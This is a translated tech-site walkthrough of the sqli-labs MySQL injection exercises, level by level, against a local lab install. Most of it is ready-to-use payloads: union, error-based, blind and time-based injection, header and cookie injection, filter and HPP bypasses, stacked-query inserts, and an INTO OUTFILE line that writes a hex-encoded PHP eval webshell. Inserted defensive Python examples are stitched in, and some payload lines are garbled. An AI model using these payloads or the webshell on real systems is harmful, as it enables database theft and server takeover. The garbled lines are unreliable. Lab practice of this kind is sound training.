2025-01-14 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/01 Report--
The following is a detailed, level-by-level walkthrough of manual MySQL injection. It differs slightly from what books describe, because it was put together by technical staff from hands-on work with users, and is shared here for its practical value. I hope it is of help to readers.
Less-1 (plain character type)
http://127.0.0.1/sql/Less-1/?id=1
Appending ' to the parameter suggests character (string) injection.
Use an and condition to confirm.
This indicates that injection exists.
Use order by to find the number of query fields.
There are 3 fields.
Use union select to find which positions are displayed on the page.
Query the database name.
Query the table names.
Query the column names.
Query the contents.
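The Less-1 probe sequence above (break the quote, and-true/and-false, count the fields with order by, then union select), run as an added example that is not part of the original walkthrough. It compares a query that splices the id into the string, as the exercise does, with the same query using a bound parameter; sqlite3 stands in for MySQL and the users table is constructed here.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the exercise's users table (sqlite3, not MySQL).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")])
    return db

def vulnerable(db, user_id):
    # Less-1 style: the value is spliced inside single quotes, so a quote in
    # the input ends the string and the remainder is parsed as SQL.
    sql = f"SELECT id, username, password FROM users WHERE id='{user_id}' LIMIT 0,1"
    return db.execute(sql).fetchall()

def hardened(db, user_id):
    # Same query with a bound parameter: the value is data, never SQL text.
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 0,1"
    return db.execute(sql, (user_id,)).fetchall()

# The walkthrough's probes, in the order the page applies them.
PROBES = {
    "quote":        "1'",
    "and true":     "1' and '1'='1",
    "and false":    "1' and '1'='2",
    "order by 3":   "1' order by 3 -- ",
    "order by 4":   "1' order by 4 -- ",
    "union select": "-1' union select 1,2,3 -- ",
}

def probe(fn, db, value):
    # Report what the page would show: returned rows, or a database error.
    try:
        return ("rows", fn(db, value))
    except sqlite3.Error as exc:
        return ("error", str(exc))

def run_probes(fn, db):
    return {name: probe(fn, db, value) for name, value in PROBES.items()}

if __name__ == "__main__":
    db = make_db()
    for variant in (vulnerable, hardened):
        print(variant.__name__)
        for name, outcome in run_probes(variant, db).items():
            print(f"  {name:13} {outcome[0]:5} {outcome[1]}")
```

With the bound parameter every probe simply returns no row, so the error, the true/false difference and the displayed positions that the walkthrough relies on are all gone.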
Less2 (plain numeric type)
Numeric injection.
Less3 (character type with parentheses)
Using ' shows the concatenated query in the error, so this may be character injection.
Use and to judge.
Confirm that it is the injection point.
Use order by to find the number of query fields.
Less4 (double-quoted character type with parentheses)
Neither ', a numeric probe nor %81 gives a verdict; using " shows that this may be double-quote injection with parentheses.
Use and.
Order by.
Less5 (double query, single quotes)
Using ' shows that this may be character injection.
Use and.
Preliminary determination of injection.
Order by determines the number of fields.
Union select to look for the display positions on the page.
This fails: nothing is displayed on the page. When the injection returns no visible position, the double-query injection method can be used.
Fixed template for double-query injection:
union select 1 from (select count(*), concat(floor(rand(0)*2), (injection statement)) a from information_schema.tables group by a) b
Query the tables.
Too many results to show in one error, so page through them with limit.
http://127.0.0.1/sql/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1), 1)) > 113
' or 1 group by concat_ws(0x3b, rand(), floor(rand(0)*2)) having min(0) or '1
Less6 (double query, double quotes)
Neither ', a numeric probe nor wide bytes gives a verdict; using " shows that this is double-quote character injection.
Use and.
Order by.
Union select.
No display position is returned, so use double-query injection.
Less7 (double parentheses, blind injection with mid/ascii, time-based)
Neither ' nor a numeric probe gives a verdict. Following Less2, guess that there may be parentheses.
Trying to replace the trailing and with a comment fails.
Guess that there may be a parenthesis after the point where the comment is placed.
Try double parentheses.
Use order by.
Use union select.
No echo, and double-query injection fails.
Blind injection using the mid function.
Determine the length of the database name:
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR), 0x20)), 9)) > 1
Query the tables:
AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR), 0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7365637572697479 LIMIT 0,1), 1,1)) > 1--
LIMIT 0,1), 1,1
LIMIT 0,1 selects one table at a time, to test whether the first table exists; MID(..., 1,1) selects one character at a time, to test whether the first character exists.
Query the columns:
AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR), 0x20) FROM INFORMATION_SCHEMA.columns WHERE table_schema=0x7365637572697479 LIMIT 0,1), 1)) > 105
Check the contents:
AND ORD(MID((SELECT IFNULL(CAST(id AS CHAR), 0x20) FROM emails limit 0,1), 1)) > 48
Use ascii:
')) and (ascii(substr((select database()), 8)) > 1) and sleep(5)
It can also be used on its own:
')) and (ascii(substr((select database()), 8)) > 1)
Less8 (character type, blind injection with mid)
Using ' and and shows that injection exists.
Order by.
Union select returns no display position.
Double-query injection fails.
Use mid.
The database name has 8 characters in total.
Less9 (time-based blind, single quotes)
Neither ', a numeric probe, wide bytes nor parentheses gives a verdict; use sleep to judge.
Try ' together with sleep.
Preliminary judgment: time-based blind injection.
Use and.
Use mid.
Use ascii:
' and (ascii(substr((select database()), 9)) > 1) and sleep(5) and '1
Less10 (time-based blind, double quotes)
Neither ', a numeric probe, wide bytes nor parentheses gives a verdict, and sleep with single quotes gives none either; following Less4, guess double quotes.
Use mid.
Less11 (POST, character type)
Capture the request parameters.
POST injection.
Injection test on uname.
Using ' shows that there may be injection.
Use or to explore further (mainly a universal login statement, to check whether the login succeeds; using and is more trouble here).
Or use and to inject further.
Conventional character injection.
Use double query.
Use mid.
Less12 (POST, character type with parentheses)
Neither ', a numeric probe nor wide bytes gives a verdict; using " shows that there may be injection, with parentheses.
Use or.
Order by.
Union select.
Less13 (double query, with parentheses)
Using ' shows that it is character type with parentheses.
Use and.
Order by.
Union select returns no display position.
Use double query:
union select 1 from (select count(*), concat(floor(rand(0)*2), (select database())) a from information_schema.tables group by a) b
Less14 (double query, double quotes)
Less15 (time-based blind injection, mid)
Use ', and, or and order by.
Union select returns no display position, and double query fails.
Try sleep.
Less16 (time-based blind injection, mid, with parentheses)
Less17 (error-based injection) sqlmap hangs
The hint here is a password reset, so the back end should be using an update statement; the payloads for insert, update and delete are used in the same way.
or updatexml(2, concat(0x1, (injection statement)), 0) or '
and extractvalue(1, concat(0x7f, (select version()), 0x7f))
and 1=(select * from (select NAME_CONST(version(), 1), NAME_CONST(version(), 1)) as x)
Use a subquery:
' or (SELECT 1 FROM (SELECT count(*), concat((SELECT (SELECT concat(0x1, cast(database() as char), 0x1)) FROM information_schema.tables limit 0,1), floor(rand(0)*2)) x FROM information_schema.columns group by x) a) or '
Less18 (User-Agent, error-based, time-based, subquery)
Looking at the page, the injection for this level is in the HTTP request headers (without the hint you would have to try the login box first).
Simply testing Host and User-Agent with ' shows that the injection point may be User-Agent.
and and or give no further verdict; try sleep.
Use a subquery:
' or (SELECT 1 FROM (SELECT count(*), concat((SELECT (SELECT concat(0x1, cast(database() as char), 0x1)) FROM information_schema.tables limit 0,1), floor(rand(0)*2)) x FROM information_schema.columns group by x) a) or '
' or (SELECT 1 FROM (SELECT count(*), concat((SELECT (SELECT concat(0x1, cast(database() as char), 0x1))), floor(rand(0)*2)) x FROM information_schema.columns group by x) a) or '
Error-based injection:
' or updatexml(2, concat(0x1, (database()), 0x1), 0) or '
Less19 (Referer, error-based, time-based, subquery)
There may be injection in the Referer field.
Use '.
and and or fail; use sleep.
Use a subquery:
' or (SELECT 1 FROM (SELECT count(*), concat((SELECT (SELECT concat(0x1, cast(database() as char), 0x1))), floor(rand(0)*2)) x FROM information_schema.columns group by x) a) or '
Error-based injection:
' or updatexml(2, concat(0x1, (database()), 0x1), 0) or '
Less20 (cookie injection, double query)
Use '.
Use and.
Union.
Use double query.
Less21 (cookie injection, base64 encoded)
The cookie is known to be base64 encoded.
Use '.
Use admin') and 1=1--
Use admin') and 1=2--
Use order by.
Union:
admin') and 1=2 union select 1,2,3
Less22 (cookie injection, base64 encoded, double quotes)
Neither ', a numeric probe nor wide bytes gives a verdict; " gives a preliminary judgment.
Use and.
Use admin" and 1=2 union select 1,2,3--
Less23 (error-based injection, subquery)
Use '.
Use and.
Double query fails.
Use error-based injection:
or updatexml(2, concat(0x1, (injection statement)), 0) or '
Use a subquery:
' and (SELECT 1 FROM (SELECT count(*), concat((SELECT (SELECT concat(0x1, cast(database() as char), 0x1))), floor(rand(0)*2)) x FROM information_schema.columns group by x) a) and '
Less24 (second-order injection)
No injection is found in the login request. After logging in, there is a password reset feature; that is probably an update statement, where error-based injection could be used. But when the request is submitted, the username whose password is reset is not taken from the submitted data. At this point, second-order injection may exist.
The most basic way to exploit this is as follows. The system is known to have an admin account. We register a user named admin'-, log in as it and change the password. By the code's logic this should change the password of the admin'- user; in fact it changes the password of the admin account, even though we do not know admin's original password.
Because the database limits the length of the username and I was too lazy to change that, error-based injection should also be possible here.
Less25 (character injection, and/or filtered once)
Use '.
Use and or or.
The and and or keywords are filtered, and changing case fails.
Use double nesting: nest an and inside an and.
The URL encoding of && (%26%26) can also be used.
Use order by.
Less25a (numeric, and/or filtered once)
' gives no verdict, but a numeric probe does.
Use aandnd 1=1
Less26 (character injection, spaces and comments filtered)
Use '.
Use and.
Spaces and comments are filtered, as well as and and or as in the previous level; these can be bypassed with nesting or with the URL encoding of the equivalent symbols (&& and ||).
Instead of spaces and comments, use && or ||, then use error-based injection:
-1%27%26%26extractvalue(1,concat(0x1,database()))%26%26%271
-1%27||extractvalue(1,concat(0x1,database()))||'1
'%26%26updatexml(2,concat(0x1,(database())),0)%26%26%271
But continuing to query requires spaces, so bypass with the encoding of other characters: Linux uses %0a, Windows %0a%0d, sometimes %0a. This did not work in my environment, possibly because of my MySQL version, so I test according to my own environment and ignore this: in the next few levels I comment out all the code that filters spaces. You just need to know that spaces can be replaced by the encodings above.
Less26a (with parentheses, no MySQL error message)
Use '.
Use and.
and and comments are filtered.
From the last screenshot, the data returned is still id=1; consider that there may be parentheses.
Try it with parentheses.
order by cannot be used; * is filtered, so subqueries cannot be used; MySQL errors are not shown, so error-based injection cannot be used; use union select to guess.
You can also use 2') aandnd 1, union select 1, ('3)
Less27 (error-based injection, filtering)
Use '.
Use and.
Comments are filtered.
Because comments are filtered, the trailing ' cannot be commented out, so consider double query and error-based injection.
Use double query.
union select is filtered.
Use nesting.
* is also filtered, so double query cannot be used; continue with error-based injection:
' and updatexml(2, concat(0x1, (database())), 0) and '1
Query the tables: from the above, select cannot be bypassed with nesting, so try case variation.
Less27a (TBD, double quotes)
Neither ', a numeric probe nor wide bytes gives a verdict, but " does.
Use and.
Comments are filtered.
Because comments are filtered, try double query or error-based injection.
* is filtered, so double query cannot be used; MySQL errors are not shown, so error-based injection cannot be used.
Use union select to guess.
Less28 (union select filtered, ascii guessing)
Use '.
Use and.
Comments are filtered.
There may be parentheses.
MySQL errors are not shown, so error-based injection cannot be used; * is filtered, so double query and subquery cannot be used.
Use union select to guess.
union and select are filtered, and nesting fails.
union select followed by a space is filtered (bypass with %a0; figure borrowed).
Use ascii:
') and (ascii(substr((sElect (database())), 1)) > 114) and
Less28a (union select filtered)
Same as 28, but comment characters can be used.
Use order by.
Use union select, same as 28.
Use ascii.
Less29 (HPP)
Use '.
This shows that there is some protection. Encoding can be tried, but it does not succeed. Use HPP (HTTP parameter pollution, https://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf) for the next step.
Use '.
Use and.
Less30 (HPP, double quotes)
Using ' shows that it is protected; encoding bypass fails; use HPP.
', a numeric probe and wide bytes fail; use ".
Less31 (HPP, double quotes and parentheses)
Same detection as above.
It shows double quotes with parentheses.
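The parameter pollution that Less29 to Less31 rely on, as an added example that is not part of the original walkthrough: the same parameter is sent twice, and the HPP paper linked above describes how different layers keep different occurrences. Which layer keeps the first and which the last is an assumption made here for illustration; the request is constructed.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed request: a clean first value and an injected second one.
POLLUTED_URL = "http://127.0.0.1/sql/Less-29/?id=1&id=2'"
CLEAN_URL = "http://127.0.0.1/sql/Less-29/?id=1"

def values(url, name):
    # Every occurrence of the parameter, in order of appearance.
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get(name, [])

def first_value(url, name):
    # What a layer that keeps the first occurrence sees (assumed: the filter).
    vals = values(url, name)
    return vals[0] if vals else None

def last_value(url, name):
    # What a layer that keeps the last occurrence sees (assumed: the application).
    vals = values(url, name)
    return vals[-1] if vals else None

def is_numeric_id(value):
    # The allow-list check a numeric id has to pass.
    return value is not None and value.isdigit()

def polluted(url, name):
    # Defensive check: a parameter given more than once with differing values
    # means the two layers cannot be trusted to reason about the same input.
    return len(set(values(url, name))) > 1

def accept(url, name="id"):
    # Reject polluted requests outright, then validate the single value.
    if polluted(url, name):
        return False
    return is_numeric_id(first_value(url, name))

if __name__ == "__main__":
    print("filter sees:", first_value(POLLUTED_URL, "id"))
    print("application sees:", last_value(POLLUTED_URL, "id"))
    print("accepted:", accept(POLLUTED_URL))
```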
Less32 (wide byte)
Use '.
From the above we can already see that this level uses wide bytes, but we still follow the steps above. A numeric probe gives no verdict; a wide-byte probe (http://eth20.blog.51cto.com/13143704/1962804) gives a preliminary indication of injection.
Use and.
Use hexadecimal when querying the tables.
Less33
Same as above?
Less34 (wide byte, double query)
' and a numeric probe give no verdict; use wide bytes.
Use or.
Use double query.
Less35 (numeric)
' fails.
Use numeric type.
Use order by.
Less36
Same as 32.
Less37
Same as 34?
Less38 (stacked query)
Same as 1; in addition, ; can be used to execute multiple statements.
'; insert into users (id,username,password) values
Less39
Same as 2.
Less40
Use '.
Use and.
Comments cannot be used, or there may be parentheses after the value.
Subquery fails and no error is shown, so use blind injection.
Use ascii blind injection (time-based can also be used):
' and (ascii(substr((select database()), 8, 1)) > 1) and '1
'); insert into users (id,username,password) values (' 40th); and ('1century)
Less41
Same as 39.
Less42
Username: anything
Password: 1 destroy insert into users (id,username,password) values ('42 minutes and minutes eth20)--
Less43
Password: 1'); insert into users (id,username,password) values
Less44
Same as 42.
Less45
Same as 43.
Less46 (injection after order by)
By comparison we can see that the injection point is the parameter after order by.
Compare using desc.
Use error-based injection:
(select count(*) from information_schema.columns group by concat(0x1, (database()), 0x1, floor(rand(0)*2)))
The following also applies to injection after limit.
Export a file, write a webshell:
sort=1 into outfile "F:\phpStudy\WWW\sql\Less-40\eth20.php" lines terminated by 0x203C3F70687020406576616C28245F504F53545B226574683130225D293B3F3E
Use blind injection:
1 and if(ascii(substr(database(), 1, 1))=114, 0, sleep(5))--+
Less47
Same as 46, just character type.
' procedure analyse(extractvalue(rand(), concat(0x1)), 1)
' and (updatexml(2, concat(0x1, (database())), 0))
Use time-based injection: 1' and if(ascii(substr(database(), 1, 1))=114, 0, sleep(5))--+
Less48
Same as 46; errors cannot be used, so use blind injection.
Use rand:
rand(ascii(left(database(), 1))=116)
Less49
Same as 47, no error echo.
Time-based blind injection:
1' and (if(ascii(substr(database(), 1, 1))=114, 0, sleep(5)))--
This concludes the detailed walkthrough of manual MySQL injection; I hope this article brings you some new knowledge.